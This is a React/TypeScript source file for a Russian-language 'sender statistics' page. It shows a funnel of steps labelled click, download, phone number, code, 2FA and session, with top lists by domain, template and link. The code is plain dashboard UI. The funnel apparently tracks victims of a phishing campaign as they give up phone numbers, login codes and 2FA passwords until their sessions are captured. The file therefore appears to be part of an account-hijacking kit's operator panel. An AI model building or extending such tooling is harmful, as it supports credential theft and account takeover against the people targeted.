import {
	fetchSenderStatsFunnel,
	fetchSenderStatsTop,
	type ISenderStatsFunnelStep,
	type SenderStatsPeriod,
	type SenderStatsTopDimension,
} from '@/api/sender-stats';
import { Spinner } from '@/components/ui/spinner';
import SenderLoadError from '@/pages/sender/components/sender-load-error';
import SenderSegment from '@/pages/sender/components/sender-segment';
import { senderSurfaceClass } from '@/pages/sender/components/sender-surface';
import { SenderScreen } from '@/pages/sender/sender-screen';
import { useCallback, useEffect, useState } from 'react';

const PERIODS: { value: SenderStatsPeriod; label: string }[] = [
	{ value: 'day', label: 'День' },
	{ value: 'week', label: 'Неделя' },
	{ value: 'month', label: 'Месяц' },
	{ value: 'year', label: 'Год' },
	{ value: 'all', label: 'Всё' },
];

const TOP_TABS: { value: SenderStatsTopDimension; label: string }[] = [
	{ value: 'domain', label: 'Домены' },
	{ value: 'template', label: 'Шаблоны' },
	{ value: 'link', label: 'Ссылки' },
];

const FUNNEL_LABELS: Record<string, string> = {
	connect: 'Клик',
	download: 'Скачивание',
	phone: 'Номер',
	code: 'Код',
	password: '2FA',
	session: 'Сессия',
};

function funnelLabel(step: ISenderStatsFunnelStep): string {
	return FUNNEL_LABELS[step.key] ?? step.label;
}

export default function SenderStatsPage() {
	const [period, setPeriod] = useState<SenderStatsPeriod>('week');
	const [dimension, setDimension] = useState<SenderStatsTopDimension>('domain');
	const [loading, setLoading] = useState(true);
	const [error, setError] = useState(false);
	const [funnel, setFunnel] = useState<Awaited<ReturnType<typeof fetchSenderStatsFunnel>> | null>(null);
	const [top, setTop] = useState<Awaited<ReturnType<typeof fetchSenderStatsTop>> | null>(null);

	const load = useCallback(async () => {
		setLoading(true);
		setError(false);
		try {
			const [funnelData, topData] = await Promise.all([
				fetchSenderStatsFunnel(period),
				fetchSenderStatsTop(period, dimension),
			]);
			setFunnel(funnelData);
			setTop(topData);
		} catch {
			setFunnel(null);
			setTop(null);
			setError(true);
		} finally {
			setLoading(false);
		}
	}, [period, dimension]);

	useEffect(() => {
		void load();
	}, [load]);

	return (
		<SenderScreen title='Статистика'>
			<div className='overflow-x-auto'>
				<SenderSegment
					className='min-w-[320px]'
					options={PERIODS}
					value={period}
					onChange={setPeriod}
				/>
			</div>
			{loading && !funnel ? (
				<div className='flex justify-center py-8'>
					<Spinner />
				</div>
			) : null}
			{error ? <SenderLoadError onRetry={() => void load()} /> : null}
			{funnel ? (
				<ol className='flex flex-col gap-2'>
					{funnel.funnel.map(step => (
						<li
							key={step.key}
							className={senderSurfaceClass + ' flex min-h-11 items-center justify-between gap-3 px-3 py-2 text-[15px]'}
						>
							<span>{funnelLabel(step)}</span>
							<span className='tabular-nums font-medium'>{step.count.toLocaleString('ru-RU')}</span>
						</li>
					))}
				</ol>
			) : null}
			<SenderSegment options={TOP_TABS} value={dimension} onChange={setDimension} />
			{top && top.items.length === 0 ? <p className='text-[15px]'>За этот период пусто</p> : null}
			{top && top.items.length > 0 ? (
				<ul className='flex flex-col gap-2'>
					{top.items.map(item => (
						<li
							key={item.id}
							className={senderSurfaceClass + ' flex min-h-11 items-center justify-between gap-3 px-3 py-2 text-[15px]'}
						>
							<span className='truncate'>{item.label}</span>
							<span className='tabular-nums font-medium'>{item.sessions.toLocaleString('ru-RU')}</span>
						</li>
					))}
				</ul>
			) : null}
		</SenderScreen>
	);
}
